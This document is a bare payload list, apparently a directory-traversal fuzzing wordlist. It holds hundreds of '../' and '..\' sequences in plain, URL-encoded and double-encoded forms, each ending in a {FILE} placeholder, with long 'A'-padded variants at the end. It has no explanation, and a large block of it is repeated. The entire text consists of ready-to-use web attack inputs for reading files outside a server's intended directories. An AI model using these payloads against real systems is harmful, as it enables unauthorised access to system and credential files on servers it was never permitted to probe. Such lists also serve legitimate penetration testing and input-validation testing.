..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
